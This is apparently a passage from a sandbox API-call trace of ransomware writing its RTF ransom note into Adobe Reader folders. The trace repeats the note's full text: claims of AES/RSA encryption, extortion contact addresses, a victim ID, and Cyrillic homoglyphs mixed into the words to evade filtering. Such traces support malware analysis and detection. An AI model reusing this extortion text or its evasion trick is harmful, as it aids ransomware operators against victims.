r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.906] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.907] CloseHandle (hObject=0x1e4) returned 1 [0064.908] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\bg85_info.rtf")) returned 0xffffffff [0064.908] GetLastError () returned 0x2 [0064.908] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 